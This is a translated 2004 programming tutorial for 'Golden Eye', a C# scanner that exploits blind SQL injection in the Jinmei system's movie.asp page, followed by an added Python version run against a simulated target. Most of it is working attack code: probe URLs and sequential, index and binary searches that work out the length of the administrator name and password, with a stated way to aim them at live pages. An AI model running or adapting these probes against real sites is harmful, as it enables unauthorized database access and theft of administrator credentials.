Golden Eye - SQL Injection Scanner Development (2)
(Author: mikespook | Date: 2004-5-16 | Views: 51)
Keywords: Golden Eye, SQL injection, scanner, C#

Program development: I can finally start my favourite part (^_*). First, a word on how I chose a programming tool. Most of my tools are written on the .NET platform in C#. A lightweight tool like this should be written in whatever way is quickest and most convenient. You could of course write it in C/C++ or even assembly, and the result would run very fast, but isn't that rather a waste? Let me digress for a moment: a friend left a message on my site asking how to learn programming. My view is that a language is only a carrier, a means of expression. Everyone has had this experience: when describing an event or an object, sometimes words are more precise and convenient, and sometimes a numerical description is better. Programming is the same. You can use any language, but you should pick the most convenient and fastest one for the job. What I object to is rejecting intermediate languages such as C# or Java because you happen to like assembly, or rejecting C/C++ because you happen to like C# or Java. That is completely wrong!!! All right, enough rambling; I have padded my word count enough. I just want everyone to understand why I am working in C# today.

Hey... the usual approach: first the interface, so you get an intuitive feel for it. Today we are going to design a scanner that looks like this (Figure 1). Place four text boxes on the form: txtPage, txtName, txtPass and txtLog, serving respectively as the target page input box, the administrator name display box, the password display box and the log display box. Place two buttons, btnTest and btnOK, as the test button and the scan button. Then add some labels to tidy things up and explain what each control does. The interface really is simple. Now we can start coding.

To reach our target page and submit the carefully prepared SQL injection code, we have to go out over the network using the HTTP protocol: connect, send, receive, disconnect, and so on, the whole procedure we just went through when talking about writing this in C/C++.
In C# there is no need for all that trouble. The .NET class library already provides the classes for working with URLs. Under the namespace System.Net there are two classes, HttpWebRequest and HttpWebResponse, for the request and the response respectively. See the following code for how they are used:

    // Fetch url and report whether the server answered 200 OK.
    public bool getPage(string url)
    {
        try
        {
            // Temporary result variable.
            bool r = false;
            // Create an HttpWebRequest object for the given URL.
            HttpWebRequest myHttpWebRequest = (HttpWebRequest)WebRequest.Create(url);
            // Send the request and wait for the response.
            HttpWebResponse myHttpWebResponse = (HttpWebResponse)myHttpWebRequest.GetResponse();
            // Set r to true when the status code is HttpStatusCode.OK (200).
            if (myHttpWebResponse.StatusCode == HttpStatusCode.OK)
                r = true;
            // Release the resources held by the response.
            myHttpWebResponse.Close();
            // Return the temporary variable r.
            return r;
        }
        catch (WebException)
        {
            // GetResponse() throws WebException for 4xx/5xx replies (including the 500
            // we are interested in) and for network failures; report "not accessible".
            return false;
        }
        catch (Exception)
        {
            // Any other error also counts as "not accessible".
            return false;
        }
    }

This function accesses the target page given by the parameter url. The line "HttpWebRequest myHttpWebRequest = (HttpWebRequest)WebRequest.Create(url);" creates an HttpWebRequest object bound to the target page. "HttpWebResponse myHttpWebResponse = (HttpWebResponse)myHttpWebRequest.GetResponse();" sends the request and creates an HttpWebResponse object to receive the reply. The response code is stored in myHttpWebResponse.StatusCode. This is the code returned by the server: for example, 200 means the access succeeded, 404 means the page does not exist, and 500 means an internal server error (well, when the SQL injection from earlier fails, doesn't the page show a 500 error? Yes, keep reading!). The values of the enumeration type HttpStatusCode are exactly those server return codes: HttpStatusCode.OK stands for 200 and HttpStatusCode.InternalServerError for 500. The code compares the response code myHttpWebResponse.StatusCode with the enumeration value HttpStatusCode.OK; if they are equal, the page was fetched successfully and the function returns true, otherwise it returns false. I also wrap the whole thing in try...catch... to capture any errors that may occur; any error makes the function return false. One practical detail worth knowing: for 4xx and 5xx replies HttpWebRequest.GetResponse() does not return a response object but throws a WebException, so the 500 case that matters to us actually lands in the catch (WebException) block rather than in the StatusCode comparison. The result is the same, false. Add this function to the main form's class, and remember to add a using directive for the namespace System.Net in that class. That completes the core part. Now let's see how the function is used.
Add the following code to the Click event of the button btnTest:

    private void btnTest_Click(object sender, System.EventArgs e)
    {
        // Append "and 1=1" (spaces URL-encoded as %20) to the target page address.
        if (this.getPage(txtPage.Text + "%20and%201=1"))
            txtLog.Text = "This page may have a SQL injection vulnerability; try scanning!";
        else
            txtLog.Text = "This page has no SQL injection vulnerability and cannot be scanned!";
    }

txtPage.Text + "%20and%201=1" builds the SQL injection string by appending to the address of the target page that was entered in the txtPage text box. Remember the "and 1=1" mentioned earlier? Here the spaces are simply URL-encoded as %20. The function getPage() then determines whether the page can be accessed: if it returns true, the page loaded and the injection test succeeded; otherwise it failed. Keep in mind that a page which simply ignores the appended text also answers 200, so this single request is only a first hint; the real confirmation comes from the scan below, where true and false conditions must produce different answers.

Now that getPage() is written, let's look at how the scan is really implemented. This is the hardest part, but thinking through the process is very interesting. When I explained the SQL injection vulnerability, I said that "movie.asp?id=123 and 1=(select id from password where len(name)=10)" can be used to determine whether the user name is 10 characters long. In the Jinmei system the maximum length of the administrator name is 20. So we can try "movie.asp?id=123 and 1=(select id from password where len(name)=1)", "movie.asp?id=123 and 1=(select id from password where len(name)=2)", "movie.asp?id=123 and 1=(select id from password where len(name)=3)", ... and in this way test the administrator name's length all the way to the end. The same method can of course also test the length of the password, except that the Jinmei system sets its maximum length at 50. Write the following function:

    // strPage holds the target page address (the contents of txtPage);
    // its declaration as a form field is assumed here, the article does not show it.
    private int getFieldLen(string table, string field, int l, int h)
    {
        for (int i = l; i <= h; i++)
            if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
                return i;
        return 0;
    }

This function is very general. It has four parameters: table is the table we want to scan, which in the Jinmei system is the table password; field is the field we want to test, such as name and pwd in the Jinmei system; the two parameters l and h give the range of the scan, that is, the minimum and maximum length to test. We can use it to scan the administrator name with getFieldLen("password", "name", 1, 20); the function then returns the length of the administrator name. To scan the password length: getFieldLen("password", "pwd", 1, 50). Note that the whole trick rests on "1=(select id ...)", which only works when the subquery yields the single id 1; if it returns nothing or more than one row, the comparison fails or errors and the probe reads as "false".

What you see is the function from Golden Eye 1.0, and it can only be described as very slow, because to find the length of a field we must compare one value at a time. In an extreme case where the other side has set a 20-character administrator name and a 50-character password, that takes 20 and 50 requests respectively to get the lengths we need. This algorithm is called "sequential search". Its advantage is simplicity: as everyone can see, the lookup is done in just four lines of code.
Unfortunately, simple as it is, it executes inefficiently! In Golden Eye 1.1 I use an "index search" to improve efficiency:

    // Only the first branch of this function survived on the page; the other two
    // branches are restored from the description that follows.
    private int getFieldLen(string table, string field, int l, int h)
    {
        int index1 = (l + h) / 3;
        int index2 = (l + h) * 2 / 3;
        if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")<" + index1.ToString() + ")"))
        {
            // Length is below the first index: scan l .. index1-1 sequentially.
            for (int i = l; i < index1; i++)
                if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
                    return i;
        }
        else if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")<" + index2.ToString() + ")"))
        {
            // Length is below the second index: scan index1 .. index2-1 sequentially.
            for (int i = index1; i < index2; i++)
                if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
                    return i;
        }
        else
        {
            // Otherwise scan index2 .. h sequentially.
            for (int i = index2; i <= h; i++)
                if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
                    return i;
        }
        return 0;
    }

The "index search" code is rather more complicated! Actually, once I tell you what it does, it becomes very clear. Look at the following sequence: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20. This is the sequence we want to search. The first two statements of the search, "int index1 = (l + h) / 3;" and "int index2 = (l + h) * 2 / 3;", actually establish two indices. For a search over these 20 elements the first index is 7 and the second is 14. Notice that each sequential search loop is preceded by a conditional statement; that condition tests against the index. The process is roughly: determine whether the field length is less than 7; if so, search 1-6 sequentially. Otherwise determine whether the length is less than 14; if so, search 7-13 sequentially. Otherwise search 14-20 sequentially. The indices thus cut the search range by two thirds; a smaller range means fewer comparisons, and the speed is of course much better. But is this the fastest way? Look at the following code:

    private int getFieldLen(string table, string field, int l, int h)
    {
        int nLen = 0;
        int low = l;
        int hig = h;
        int mid;
        // Loop guard so a target that never answers "true" cannot loop forever
        // (the original used h - l, which skips the case l == h).
        int tmp = h - l + 1;
        while ((low <= hig) && (tmp != 0))
        {
            mid = (low + hig) / 2;
            if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")<" + mid.ToString() + ")"))
                hig = mid - 1;      // length is in [low, mid-1]
            else if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")>" + mid.ToString() + ")"))
                low = mid + 1;      // length is in [mid+1, hig]
            else if (this.getPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + mid.ToString() + ")"))
            {
                nLen = mid;         // found it
                break;
            }
            --tmp;
        }
        return nLen;
    }

It looks quite complicated: every pass through the loop computes new bounds from the previous ones. This is "binary search" (折半查找, literally "halving search"). Each pass costs at most three requests, and the range halves every time, so the number of requests grows with the logarithm of h - l instead of with h - l itself.
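To make the request counts of the three strategies concrete, and to show the getPage() idea in another language, here is an added Python example. It is not Golden Eye code and not from the article's author: http_oracle() is a urllib counterpart of getPage() (a 200 reply means "true", a 500 or a network error means "false") for use against a real target, while FakeTarget is a constructed, offline stand-in for the Jinmei movie.asp page that parses the injected len(field) condition and answers the way the article describes. The page address, table and column names and the administrator values are all assumptions for the demo. The binary search here generalizes the article's loop to one ">" probe per halving plus a final "=" confirmation, so a target that never answers "true" yields 0 rather than a guess.

```python
"""Blind SQL injection length probing: the three search strategies from the
Golden Eye write-up, run against a constructed offline stand-in for the target."""
from __future__ import annotations

import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Tuple

Oracle = Callable[[str], bool]  # URL -> "did the page answer 200?"


def http_oracle(url: str, timeout: float = 10.0) -> bool:
    """urllib counterpart of the article's getPage(): True only for a 200 reply.
    urlopen raises HTTPError for 4xx/5xx (the 500 the scanner keys on) and
    URLError for connection failures; both become False, like the C# catch blocks."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status == 200
    except (urllib.error.URLError, OSError):  # HTTPError is a URLError subclass
        return False


def length_probe(page: str, table: str, field: str, op: str, n: int) -> str:
    """Build the probe URL exactly as the scanner concatenates it, e.g.
    movie.asp?id=123%20and%201=(select%20id%20from%20password%20where%20len(name)=10)
    The 1=(select id ...) trick only works when the subquery yields the single id 1."""
    assert op in ("<", ">", "=")
    return (page + "%20and%201=(select%20id%20from%20" + table
            + "%20where%20len(" + field + ")" + op + str(n) + ")")


_PROBE = re.compile(
    r"%20and%201=\(select%20id%20from%20(\w+)%20where%20len\((\w+)\)([<>=])(\d+)\)$")


class FakeTarget:
    """Constructed stand-in for the Jinmei movie.asp page (an assumption, not real
    Jinmei behaviour): one 'password' row with id 1. A true injected condition
    renders the page (200 -> True); a false one or a bad column errors (500 -> False)."""

    def __init__(self, row: Dict[str, str]) -> None:
        self.row = row          # e.g. {"name": "administrator", "pwd": "..."}
        self.requests = 0       # how many HTTP requests a strategy cost

    def __call__(self, url: str) -> bool:
        self.requests += 1
        m = _PROBE.search(url)
        if m is None:
            return True         # un-injected page (or plain "and 1=1") renders fine
        table, field, op, n = m.groups()
        if table != "password" or field not in self.row:
            return False        # SQL error on an unknown table/column -> 500
        actual = len(self.row[field])
        return {"<": actual < int(n), ">": actual > int(n), "=": actual == int(n)}[op]


def seq_len(oracle: Oracle, page: str, table: str, field: str, lo: int, hi: int) -> int:
    """Golden Eye 1.0 style: ask 'len = i' for every i in [lo, hi]; up to hi-lo+1 requests."""
    for i in range(lo, hi + 1):
        if oracle(length_probe(page, table, field, "=", i)):
            return i
    return 0


def index_len(oracle: Oracle, page: str, table: str, field: str, lo: int, hi: int) -> int:
    """Golden Eye 1.1 style: two '<' probes pick a third of the range, then scan it sequentially."""
    idx1, idx2 = (lo + hi) // 3, (lo + hi) * 2 // 3
    if oracle(length_probe(page, table, field, "<", idx1)):
        return seq_len(oracle, page, table, field, lo, idx1 - 1)
    if oracle(length_probe(page, table, field, "<", idx2)):
        return seq_len(oracle, page, table, field, idx1, idx2 - 1)
    return seq_len(oracle, page, table, field, idx2, hi)


def binary_len(oracle: Oracle, page: str, table: str, field: str, lo: int, hi: int) -> int:
    """Binary search with one '>' probe per halving (the article's loop spends up to
    three), plus a final '=' probe so a non-injectable target yields 0, not a guess."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(length_probe(page, table, field, ">", mid)):
            lo = mid + 1        # length is in (mid, hi]
        else:
            hi = mid            # length is in [lo, mid]
    return lo if oracle(length_probe(page, table, field, "=", lo)) else 0


def compare_strategies(target: FakeTarget, page: str, table: str, field: str,
                       lo: int, hi: int) -> Dict[str, Tuple[int, int]]:
    """Run all three strategies against the same target; returns {name: (length, requests)}."""
    out: Dict[str, Tuple[int, int]] = {}
    for name, fn in (("sequential", seq_len), ("index", index_len), ("binary", binary_len)):
        target.requests = 0
        out[name] = (fn(target, page, table, field, lo, hi), target.requests)
    return out


if __name__ == "__main__":
    PAGE = "http://example.test/movie.asp?id=123"   # hypothetical target address
    t = FakeTarget({"name": "administrator", "pwd": "Zg7!pq0rLm2xWd9sVk1tQe4"})
    for field, hi in (("name", 20), ("pwd", 50)):
        print(field, compare_strategies(t, PAGE, "password", field, 1, hi))
```

With the constructed 13-character name and 23-character password, sequential search costs 13 and 23 requests, the index search 9 and 9, and the binary search 5 and 7; swap FakeTarget for http_oracle to run the same strategies against a live page. The final "=" probe in binary_len is the check a practitioner wants: without it, a page that answers 200 to everything (no injection at all) would still "find" a length.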